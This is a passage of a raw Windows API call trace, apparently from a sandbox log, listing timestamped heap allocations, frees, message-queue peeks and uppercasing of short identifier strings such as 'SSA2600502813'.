RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.996] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0209.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0209.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0209.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0209.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0209.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0209.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0209.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0210.000] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0210.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0210.001] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.001] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.002] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0210.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0210.004] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.004] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree 